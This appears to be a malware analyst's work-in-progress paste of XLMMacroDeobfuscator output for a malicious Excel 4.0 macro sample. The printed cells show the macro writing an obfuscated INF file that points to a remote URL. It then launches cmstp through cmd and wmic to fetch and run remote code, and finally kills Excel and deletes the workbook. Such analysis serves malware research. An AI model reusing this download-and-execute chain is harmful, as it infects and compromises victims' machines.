dissectmalware

Work in progress

May 22nd, 2020
Ongoing - it is not fully deobfuscated

XLMMacroDeobfuscator(v 0.1.3) - https://github.com/DissectMalware/XLMMacroDeobfuscator

File: C:\Users\user\Downloads\saaaample.xls

[Loading Cells]
auto_open: auto_open->Macro1!$A$2
[Starting Deobfuscation]
CELL:A2 , NotImplemented , SET.NAME("Yuaf",DIRECTORY()&CHAR(92.0)&CHAR(50.0)&CHAR(52.0)&CHAR(46.0)&CHAR(116.0)&CHAR(120.0)&CHAR(116.0))
CELL:A3 , NotImplemented , SET.NAME("nCWoR",FOPEN(Yuaf,3.0))
CELL:A4 , PartialEvaluation , FWRITE("[version]
signature=$WiNdows NT$
[DestinationDirs]
e7=01
[DefaultInstall_singleUser]
UnRegisterOCXs=b0
DelFiles=e7
[b0]
%11%\%h9%CrO%q1%j,NI,%i9%%u3%%u3%p%v0%%j4%%j4%")
CELL:A5 , PartialEvaluation , FWRITE("download%q7%share-spreadsheet%q7%%d2%/readme%q7%txt
[e7]
24%q7%%u3%x%u3%
[strings]
u3=t
i9=h
v0=:
h9=s
j4=/
q1=b
q7=.
d2=com
serviceName="" ""
shortSvcName="" ""
f6=2020-05-22 16:01:58.777231")
CELL:A6 , PartialEvaluation , FCLOSE()
CELL:A7 , PartialEvaluation , REGISTER("Shell32","ShellExecuteA","JJCCCCJ","UIBsfb",1.0,9.0)
CELL:A8 , PartialEvaluation , CALL_ADDIN(0.0,"cmd.exe","/v /c set h3=times& call set q0=%h3:~0,1%& call set y8=%h3:~1,1%& s!q0!art /min """" wm!y8!c process call crea!q0!e ""cms!q0!p /ns /s /su Yuaf""",0.0)
CELL:A9 , PartialEvaluation , CALL_ADDIN(0.0,"cmd.exe","/c taskkill /f /im excel.exe & ping 127.0.0.1 -n 3 & del ""GET.DOCUMENT(2.0)\GET.WORKBOOK(16.0)""",0.0)
CELL:A10 , PartialEvaluation , RETURN()
[END of Deobfuscation]
time elapsed: 2.8414695262908936